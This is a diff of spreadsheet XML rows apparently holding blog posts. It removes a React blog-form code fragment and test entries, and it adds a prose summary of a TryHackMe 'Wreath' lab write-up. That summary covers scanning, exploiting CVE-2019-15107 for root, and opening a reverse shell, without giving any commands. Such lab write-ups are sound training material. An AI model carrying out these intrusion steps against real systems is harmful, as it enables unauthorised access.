-          <t>&lt;pre class="language-javascript"&gt;&lt;code&gt;import Cookies from "js-cookie";
-import { Editor } from "@tinymce/tinymce-react";
-import { Alert, AlertDescription } from "@/components/ui/alert";
-export function BlogForm() {
-  const [formData, setFormData] = useState({
-    title: "",
-    subtitle: "",
-    content: "",
-    category: "",
-  });
-  const [image, setImage] = useState(null);
-  const [errors, setErrors] = useState({});
-  const [isSubmitting, setIsSubmitting] = useState(false);
-  const router = useRouter();
-  const handleChange = (e) =&amp;gt; {
-    setFormData({ ...formData, [e.target.name]: e.target.value });
-  };
-  const handleEditorChange = (content, editor) =&amp;gt; {
-    setFormData({ ...formData, content });
-  };
-  const handleImageChange = (e) =&amp;gt; {
-    setImage(e.target.files[0]);
-  };
-&lt;/code&gt;&lt;/pre&gt;</t>
-        </is>
-      </c>
-      <c r="D4" s="2" t="inlineStr">
-        <is>
-          <t>Coding</t>
-        </is>
-      </c>
-      <c r="E4" s="2" t="n">
-        <v>2</v>
-      </c>
-      <c r="F4" s="2" t="n">
-        <v>5</v>
-      </c>
-      <c r="G4" s="3" t="n">
-        <v>45533.32526130015</v>
-      </c>
-      <c r="H4" s="3" t="n">
-        <v>45533.47141382429</v>
-      </c>
-      <c r="I4" s="2" t="inlineStr">
-        <is>
-          <t>/static/images/Trial_5_small.png</t>
-        </is>
-      </c>
-      <c r="J4" s="2" t="inlineStr">
-        <is>
-          <t>/static/images/Trial_5_medium.png</t>
-        </is>
-      </c>
-      <c r="K4" s="2" t="inlineStr">
-        <is>
-          <t>/static/images/Trial_5_large.png</t>
-        </is>
-      </c>
-    </row>
-    <row r="5">
-      <c r="A5" s="2" t="n">
-        <v>18</v>
-      </c>
-      <c r="B5" s="2" t="inlineStr">
-        <is>
-          <t>Albert Test</t>
-        </is>
-      </c>
-      <c r="C5" s="2" t="inlineStr">
-        <is>
-          <t>&lt;p&gt;Pythin backend is absolutely crazy!&lt;/p&gt;</t>
-        </is>
-      </c>
-      <c r="D5" s="2" t="inlineStr">
-        <is>
-          <t>any</t>
-        </is>
-      </c>
-      <c r="E5" s="2" t="n">
-        <v>0</v>
-      </c>
-      <c r="F5" s="2" t="n">
-        <v>6</v>
-      </c>
-      <c r="G5" s="3" t="n">
-        <v>45533.48422435589</v>
-      </c>
-      <c r="H5" s="3" t="n"/>
-      <c r="I5" s="2" t="inlineStr">
-        <is>
-          <t>/static/images/Albert_Test_6_small.png</t>
-        </is>
-      </c>
-      <c r="J5" s="2" t="inlineStr">
-        <is>
-          <t>/static/images/Albert_Test_6_medium.png</t>
-        </is>
-      </c>
-      <c r="K5" s="2" t="inlineStr">
-        <is>
-          <t>/static/images/Albert_Test_6_large.png</t>
+          <t>/static/images/WREATH_TryHackMe_5_large.png</t>
+        </is>
+      </c>
+      <c r="L2" s="2" t="inlineStr">
+        <is>
+          <t>&lt;h3&gt;&lt;strong&gt;Summary&lt;/strong&gt;&lt;/h3&gt;&lt;hr&gt;&lt;p&gt;This content covers a penetration testing process using Kali Linux on the Wreath network, focusing on reconnaissance and exploitation. Initially, the tester connects to the Wreath network, scans for open ports, and attempts to identify the operating system. Despite issues with OS detection, the tester identifies the system as CentOS using curl. The content also discusses resolving DNS issues and accessing a website without a certificate.&lt;/p&gt;&lt;p&gt;The second part focuses on exploiting a Remote Code Execution vulnerability (CVE-2019-15107) found on port 10000. The tester clones a repository with an exploit script, gains root access on the vulnerable machine, and establishes a reverse shell. The process concludes with shell stabilization techniques for a more functional and aesthetically pleasing terminal session.&lt;/p&gt;</t>
         </is>
       </c>
     </row>

</xml_diff>